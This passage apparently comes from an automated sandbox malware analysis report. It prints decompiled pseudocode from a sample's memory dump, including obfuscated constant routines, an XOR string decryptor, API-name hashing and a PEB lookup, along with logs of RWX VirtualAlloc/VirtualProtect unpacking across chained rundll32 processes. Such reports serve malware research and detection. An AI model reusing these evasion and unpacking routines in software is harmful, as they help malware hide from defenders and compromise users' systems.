				_v32 = _v32 ^ 0x000053bd;
				_v44 = 0x8a9a;
				_v44 = _v44 / _t139;
				_v44 = _v44 ^ 0x00006f27;
				_v48 = E10017B6B();
				_v8 = 0x4004;
				_v8 = _v8 + 0xffff74e9;
				_v8 = _v8 | 0xacc11b51;
				_t140 = 0x54;
				_push(_t140);
				_v8 = _v8 / _t140;
				_v8 = _v8 ^ 0x030c2ffb;
				_v24 = 0x843c;
				_v24 = _v24 | 0xd1d25750;
				_v24 = _v24 * 0x7a;
				_v24 = _v24 ^ 0xfe7ab108;
				_t150 = E1000607F(_t140, _t153, _t140, _v24, _v8);
				E1000D940(_t149, _v16, _v32, _v44, 3,  &_v48, _t150);
				 *((short*)(_t149 + _t150 * 2)) = 0;
				return 0;
			}

0x100173c0
0x100173c6
0x100173cf
0x100173d6
0x100173dd
0x100173e4
0x100173eb
0x100173fa
0x100173fc
0x100173ff
0x10017403
0x1001740a
0x10017411
0x10017415
0x1001741c
0x10017423
0x10017426
0x1001742a
0x10017431
0x10017438
0x1001743f
0x10017443
0x10017447
0x1001744e
0x10017455
0x1001745c
0x10017463
0x1001746a
0x1001746e
0x10017475
0x1001747a
0x1001747f
0x10017486
0x1001748d
0x10017494
0x1001749b
0x100174a2
0x100174a9
0x100174b4
0x100174b5
0x100174b8
0x100174bc
0x100174c3
0x100174cf
0x100174d2
0x100174e4
0x100174e9
0x100174f0
0x100174f7
0x10017503
0x10017506
0x10017507
0x1001750a
0x10017511
0x10017518
0x10017523
0x10017526
0x10017545
0x1001755c
0x10017566
0x1001756f

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86156a53a794c3a1ea69ef44ad5d1bbdd6e349abb558353b653a94269d0cae3
Instruction ID: aa47c26f155a7e2cbc498b37881a1f4ddfca2c0909b3e0a1f8a2a5a537750eba
Opcode Fuzzy Hash: d86156a53a794c3a1ea69ef44ad5d1bbdd6e349abb558353b653a94269d0cae3
Instruction Fuzzy Hash: B351D2B1D0120AEBDF48CFA5DA8A8DEBBB1FB48314F208159D112B72A0D3B55B45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001BF25, Relevance: .1, Instructions: 99
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1001BF25(void* __ecx, void* __edx, void* __eflags) {
				void* _t49;
				signed int _t56;
				short* _t72;
				signed int _t73;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				short* _t93;
				signed int* _t94;
				signed int* _t95;
				signed int* _t96;
				unsigned int _t98;
				void* _t104;
				short _t106;
				void* _t108;
				void* _t109;

				_t96 =  *(_t108 + 0x1c);
				_push(_t96);
				_push( *(_t108 + 0x20));
				_push(__ecx);
				E100056B2(_t49);
				 *(_t108 + 0x1c) = 0x8b96;
				_t94 =  &(_t96[1]);
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffff20a0;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffff41f6;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) << 0xc;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xeee2dc93;
				 *(_t108 + 0x30) = 0x710f;
				 *(_t108 + 0x30) =  *(_t108 + 0x30) | 0x6ece5f34;
				_t75 = 0x49;
				 *(_t108 + 0x34) =  *(_t108 + 0x30) / _t75;
				_t76 = 0x78;
				 *(_t108 + 0x30) =  *(_t108 + 0x34) / _t76;
				 *(_t108 + 0x30) =  *(_t108 + 0x30) ^ 0x00037f97;
				_t77 =  *_t96;
				_t95 =  &(_t94[1]);
				_t56 =  *_t94 ^ _t77;
				 *(_t108 + 0x20) = _t77;
				 *(_t108 + 0x24) = _t56;
				_t98 =  !=  ? (_t56 + 0x00000001 & 0xfffffffc) + 4 : _t56 + 1;
				_t109 = _t108 + 0xc;
				_t72 = E100157E8(_t98 + _t98);
				 *((intOrPtr*)(_t109 + 0x24)) = _t72;
				if(_t72 != 0) {
					_t106 = 0;
					_t93 = _t72;
					_t104 =  >  ? 0 :  &(_t95[_t98 >> 2]) - _t95 + 3 >> 2;
					if(_t104 != 0) {
						_t73 =  *(_t109 + 0x14);
						do {
							_t84 =  *_t95;
							_t95 =  &(_t95[1]);
							_t85 = _t84 ^ _t73;
							 *_t93 = _t85 & 0x000000ff;
							_t93 = _t93 + 8;
							 *((short*)(_t93 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t106 = _t106 + 1;
							 *((short*)(_t93 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t93 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t106 < _t104);
						_t72 =  *((intOrPtr*)(_t109 + 0x24));
					}
					 *((short*)(_t72 +  *(_t109 + 0x18) * 2)) = 0;
				}
				return _t72;
			}

0x1001bf2a
0x1001bf2f
0x1001bf30
0x1001bf35
0x1001bf36
0x1001bf3b
0x1001bf43
0x1001bf46
0x1001bf50
0x1001bf58
0x1001bf5d
0x1001bf65
0x1001bf6d
0x1001bf7b
0x1001bf80
0x1001bf8a
0x1001bf8d
0x1001bf91
0x1001bf99
0x1001bf9d
0x1001bfa0
0x1001bfa2
0x1001bfa6
0x1001bfba
0x1001bfc5
0x1001bfd0
0x1001bfd2
0x1001bfd9
0x1001bfe1
0x1001bfe3
0x1001bff4
0x1001bff9
0x1001bffb
0x1001bfff
0x1001bfff
0x1001c001
0x1001c004
0x1001c009
0x1001c011
0x1001c017
0x1001c01b
0x1001c024
0x1001c025
0x1001c02c
0x1001c030
0x1001c034
0x1001c034
0x1001c03f
0x1001c03f
0x1001c04b

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e2487da670dfdf4340291a23b1239054837bb09989d1aae364528b122fc451e
Instruction ID: 31a9db1899cf95c0ebf8ee9652300adac22cb49fd3d05de2bcc5fa7de42ab8ee
Opcode Fuzzy Hash: 7e2487da670dfdf4340291a23b1239054837bb09989d1aae364528b122fc451e
Instruction Fuzzy Hash: 6C318C76A183119FD314CF29C88596BF7E1FF88610F414A2EF98597280DB74E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1000903F, Relevance: .1, Instructions: 96
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1000903F(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _t136;
				signed int _t137;
				signed int _t138;

				_v56 = _v56 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_v60 = 0x4b89aa;
				_v24 = 0xd383;
				_v24 = _v24 >> 1;
				_v24 = _v24 + 0xffff6796;
				_v24 = _v24 ^ 0xffff9ecb;
				_v40 = 0x275e;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 ^ 0x00004c05;
				_v36 = 0x2d7f;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x00b5d622;
				_v12 = 0x609d;
				_v12 = _v12 * 0x39;
				_t136 = 0x71;
				_v12 = _v12 * 0x6d;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x24a35bb0;
				_v8 = 0x6158;
				_v8 = _v8 ^ 0x69c6b5b2;
				_v8 = _v8 / _t136;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0xbe8af890;
				_v44 = 0xc5d5;
				_v44 = _v44 | 0xbfd7fc3e;
				_v44 = _v44 ^ 0xbfd7cdf6;
				_v28 = 0x68fd;
				_v28 = _v28 >> 0xd;
				_v28 = _v28 + 0xaf9b;
				_v28 = _v28 ^ 0x0000e0c3;
				_v32 = 0xe5f5;
				_v32 = _v32 ^ 0x15b965a8;
				_v32 = _v32 | 0x20bfb64a;
				_v32 = _v32 ^ 0x35bfa224;
				_v20 = 0x2af5;
				_t137 = 0x36;
				_v20 = _v20 / _t137;
				_v20 = _v20 + 0xffff0be2;
				_v20 = _v20 ^ 0xaeef640c;
				_v20 = _v20 ^ 0x5110195f;
				_v48 = 0xf5d2;
				_t138 = 0x45;
				_push(__ecx);
				_v48 = _v48 / _t138;
				_v48 = _v48 ^ 0x00004994;
				_v16 = 0x4a26;
				_v16 = _v16 + 0xffffa2aa;
				_v16 = _v16 >> 7;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0xffff886f;
				_push(_v36);
				 *((intOrPtr*)( *0x100221b8 + 0x2c + __edx * 4)) = E10003708(_v12, _v8, _v44, E1001BF25(_v24, _v40, _v16), _v28);
				return E1001C5F7(_v32, _v20, _v48, _v16, _t117);
			}

0x10009045
0x10009049
0x1000904d
0x10009054
0x1000905b
0x1000905e
0x10009065
0x1000906c
0x10009073
0x10009077
0x1000907e
0x10009085
0x10009089
0x10009090
0x100090a3
0x100090aa
0x100090ad
0x100090b0
0x100090b4
0x100090bb
0x100090c2
0x100090d0
0x100090d3
0x100090d7
0x100090de
0x100090e5
0x100090ec
0x100090f3
0x100090fa
0x100090fe
0x10009105
0x1000910c
0x10009113
0x1000911a
0x10009121
0x10009128
0x10009132
0x10009137
0x1000913c
0x10009143
0x1000914a
0x10009151
0x1000915b
0x1000915e
0x1000915f
0x10009162
0x10009169
0x10009170
0x10009177
0x1000917b
0x1000917f
0x10009186
0x100091ae
0x100091cc

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa57aaca734bfc9d27f03b23d266dafba2ef08ab062a3d772196c9d4fa76611c
Instruction ID: 92030473fc267208a45804a0a9107ff8cc935f9157fe0e4ef1b606325668945c
Opcode Fuzzy Hash: aa57aaca734bfc9d27f03b23d266dafba2ef08ab062a3d772196c9d4fa76611c
Instruction Fuzzy Hash: BE41FEB1D0061DEBDF58CFA5C98A5EEBFB1FB48314F208198D411B62A0D7B91A46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10008CA3, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 15%

			E10008CA3(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v556;
				void* _t89;
				intOrPtr* _t91;
				signed int _t95;
				signed int _t96;
				signed int _t109;

				_v36 = 0;
				_v32 = 0x29d5;
				_v32 = _v32 ^ 0x626c2200;
				_v32 = _v32 ^ 0x626c072c;
				_v16 = 0x8a53;
				_v16 = _v16 ^ 0xc3c6da5f;
				_v16 = _v16 << 2;
				_v16 = _v16 | 0xabb7532b;
				_v16 = _v16 ^ 0xafbf763a;
				_v20 = 0x925b;
				_t95 = 0x78;
				_v20 = _v20 / _t95;
				_t96 = 0x72;
				_v20 = _v20 / _t96;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x0000e1f3;
				_v24 = 0x334;
				_v24 = _v24 + 0x5249;
				_t109 = 0x5c;
				_push(_t96);
				_v24 = _v24 * 0x21;
				_v24 = _v24 ^ 0x000b38a4;
				_v28 = 0x9636;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x00001dee;
				_v12 = 0xb2e5;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x878b803c;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x78b81fbb;
				_v8 = 0xb95e;
				_v8 = _v8 >> 7;
				_v8 = _v8 / _t109;
				_v8 = _v8 * 0x1d;
				_v8 = _v8 ^ 0x00001e7b;
				_t89 = E1001372F( &_v556, _v32, _v16);
				_pop(0);
				if(_t89 != 0) {
					_t91 =  &_v556;
					if(_v556 != 0) {
						while( *_t91 != _t109) {
							_t91 = _t91 + 2;
							if( *_t91 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						 *((short*)(_t91 + 2)) = 0;
					}
					L6:
					_push(0);
					_push(0);
					_push(_v8);
					_push(_v12);
					_push(0);
					_push( &_v556);
					_push( &_v36);
					_push(_v28);
					E1001C50B(_v20, _v24);
				}
				return _v36;
			}

0x10008cb1
0x10008cb4
0x10008cbb
0x10008cc2
0x10008cc9
0x10008cd0
0x10008cd7
0x10008cdb
0x10008ce2
0x10008ce9
0x10008cf6
0x10008cfb
0x10008d03
0x10008d08
0x10008d0d
0x10008d11
0x10008d18
0x10008d1f
0x10008d2a
0x10008d2b
0x10008d32
0x10008d35
0x10008d3c
0x10008d43
0x10008d47
0x10008d4e
0x10008d55
0x10008d59
0x10008d60
0x10008d64
0x10008d6b
0x10008d72
0x10008d7b
0x10008d82
0x10008d85
0x10008d92
0x10008d98
0x10008d9b
0x10008d9d
0x10008daa
0x10008dac
0x10008db1
0x10008db7
0x00000000
0x00000000
0x10008db9
0x00000000
0x10008db7
0x10008dbd
0x10008dbd
0x10008dc1
0x10008dc1
0x10008dc2
0x10008dc3
0x10008dcf
0x10008dd2
0x10008dd3
0x10008dd7
0x10008dd8
0x10008de1
0x10008de6
0x10008df1

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6b1417c14184671c41ad61bda5044eabbd7f3f842d6e1b0d6b422026d02d4ca
Instruction ID: e85a7b7b9e80fa5fa2d4e845e599cd15e0f1cf283e3ac7a04302c228e9e6df58
Opcode Fuzzy Hash: b6b1417c14184671c41ad61bda5044eabbd7f3f842d6e1b0d6b422026d02d4ca
Instruction Fuzzy Hash: 50413471D01219EBEF08CFA1D98A9EEBBB4FB44344F20819AD011A7290E7B45B84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000492A, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 961fd7a361e0172d8f30d972625903cf08f1595dadf935efa2e92da8d0bc0e0d
Instruction ID: b77e1522f9f411a300076352412bb0455ec5798372a08adffc7e0fc2ea0eca11
Opcode Fuzzy Hash: 961fd7a361e0172d8f30d972625903cf08f1595dadf935efa2e92da8d0bc0e0d
Instruction Fuzzy Hash: B9311372D0020DBFDF05CF95CC4A8EEBBB5FB48358F508158F91866260D3B69A659B90

Uniqueness

Uniqueness Score: -1.00%

Function 1001C424, Relevance: .1, Instructions: 67
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1001C424(signed short* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t48;
				signed int _t55;
				signed int _t57;
				signed int _t60;
				signed int _t67;
				signed int _t70;
				signed short* _t72;

				_push(_a4);
				_t72 = __edx;
				_push(__edx);
				E100056B2(_t48);
				_v8 = 0xd4f3;
				_t60 = 0x53;
				_v8 = _v8 / _t60;
				_v8 = _v8 ^ 0x00000290;
				_v4 = 0x6d95;
				_v4 = _v4 >> 5;
				_v4 = _v4 >> 5;
				_v4 = _v4 ^ 0x0000001d;
				_v4 = 0xb2ff;
				_v4 = _v4 * 0x7b;
				_v4 = _v4 ^ 0x00560095;
				if( *((intOrPtr*)(__edx)) != 0) {
					do {
						_t57 = _v8;
						_v4 = 0x6d95;
						_v4 = _v4 >> 5;
						_v4 = _v4 >> 5;
						_v4 = _v4 ^ 0x0000001d;
						_v4 = 0xb2ff;
						_t67 = _v8 << _v4;
						_v4 = _v4 * 0x7b;
						_v4 = _v4 ^ 0x00560095;
						_t55 =  *_t72 & 0x0000ffff;
						_t70 = _v8 << _v4;
						if(_t55 >= 0x41 && _t55 <= 0x5a) {
							_t55 = _t55 + 0x20;
						}
						_v8 = _t55;
						_t72 =  &(_t72[1]);
						_v8 = _v8 + _t67;
						_v8 = _v8 + _t70;
						_v8 = _v8 - _t57;
					} while ( *_t72 != 0);
				}
				return _v8;
			}

0x1001c428
0x1001c42c
0x1001c42e
0x1001c430
0x1001c435
0x1001c44a
0x1001c44d
0x1001c451
0x1001c459
0x1001c461
0x1001c466
0x1001c46b
0x1001c470
0x1001c47d
0x1001c481
0x1001c48c
0x1001c490
0x1001c490
0x1001c494
0x1001c49c
0x1001c4a1
0x1001c4a6
0x1001c4b3
0x1001c4c0
0x1001c4c2
0x1001c4c6
0x1001c4d6
0x1001c4d9
0x1001c4de
0x1001c4e5
0x1001c4e5
0x1001c4e8
0x1001c4ec
0x1001c4ef
0x1001c4f3
0x1001c4f7
0x1001c4fb
0x1001c501
0x1001c50a

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d7db5a319c0fddcc07e6312fb913f27f215fefaf9637745451133b23df0a8b
Instruction ID: 5b25bb63792a61215608fa0d211dbb58c93cd0ca643869af53e15713821623f5
Opcode Fuzzy Hash: e3d7db5a319c0fddcc07e6312fb913f27f215fefaf9637745451133b23df0a8b
Instruction Fuzzy Hash: B521D0B25093469BD314CF22E55941BBBE5FBC47A4F11C82EF0949A250D3B9D9888FA3

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB42, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9956f26a10fc7535e74a3f5d1cd499ec193d0b144d1b9eca5ba6eca8033bceb4
Instruction ID: 5e4aedc5437bb4b730e64eae390bb59a5c3d05a595a5c90b558fa43b463ff24e
Opcode Fuzzy Hash: 9956f26a10fc7535e74a3f5d1cd499ec193d0b144d1b9eca5ba6eca8033bceb4
Instruction Fuzzy Hash: 19212475D01209EBEF14DFE5C94A8DFBFB5EF44314F108189E514A6290D7B55A50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000D013, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 441580ea7ae88eeb6b8197ed0371b5b80a46c1aa0107404033ae04c8b844b690
Instruction ID: 20914b439a1a855b43ffabf6c900b342f87e07b14d6fa3fc41aad407bb02958c
Opcode Fuzzy Hash: 441580ea7ae88eeb6b8197ed0371b5b80a46c1aa0107404033ae04c8b844b690
Instruction Fuzzy Hash: 34218E71E00208FBEB08DFE5D94A9DEBBB6FB44310F10C099E514AB280D7B65B548F81

Uniqueness

Uniqueness Score: -1.00%

Function 10001D4D, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001D4D() {

				return  *[fs:0x30];
			}

0x10001d53

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 1980 Parent PID: 2724 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 00360530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00360575
UnmapViewOfFile.KERNELBASE(?), ref: 00360625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0036063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00360770

Memory Dump Source

Source File: 00000007.00000002.2180895731.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_340000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 5f898e094dac25c1da26c853df693d7ce79646994dce7341da441bd4a14bae82
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 25B198B4E00109DFCB48CF84C591AAEB7B5BF88304F248159E919AB355D735EE82CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0035FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0035FFD4

Strings

VirtualAlloc, xrefs: 0035FFB9, 0035FFBC

Memory Dump Source

Source File: 00000007.00000002.2180895731.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_340000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: c2e2ea4b4e64edf9645ccbab110947f74d5af1b01c03df37cd71f13658d3b665
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 04114260D082CDDEEF01D7E8C40ABEFBFB55F11705F044098DA446B282D2BA57588BB6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2452 Parent PID: 1980 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 00260530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00260575
UnmapViewOfFile.KERNELBASE(?), ref: 00260625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0026063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00260770

Memory Dump Source

Source File: 00000008.00000002.2193717506.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 31790ce3754016f8116699ee82e94ef5c968b23598474c5d52d5f6bca523d49a
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 91B1A8B4E00109DFCB48CF84C590AAEB7B5BF88304F248159E919AB345D735EE92DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0025FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0025FFD4

Strings

VirtualAlloc, xrefs: 0025FFB9, 0025FFBC

Memory Dump Source

Source File: 00000008.00000002.2193717506.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 7defab86f90389b497b00788d10df0f2df079a5aabeca69ae2a3e1f022344414
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: C4114260D082CDDEEF01D7E8C4097EFBFB55F11705F044098DA446B282D2BA57688BB6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2964 Parent PID: 2452 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 001B0530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001B0575
UnmapViewOfFile.KERNELBASE(?), ref: 001B0625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001B063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 001B0770

Memory Dump Source

Source File: 00000009.00000002.2205218225.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_190000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 6a72f608d7bbab66b13f6aad8eb04a3b540f84f2e9f230965b502c1cb9fc0ba8
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: E5B199B4E001099FCB48CF89C591AAEB7B5BF88304F208159E915AB355D735EE82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001AFF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001AFFD4

Strings

VirtualAlloc, xrefs: 001AFFB9, 001AFFBC

Memory Dump Source

Source File: 00000009.00000002.2205218225.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_190000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: a896ef7e8d8734a45e50ba1b6c3b63a4ccc1cc504e587fe0f7c18d041913a3b7
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
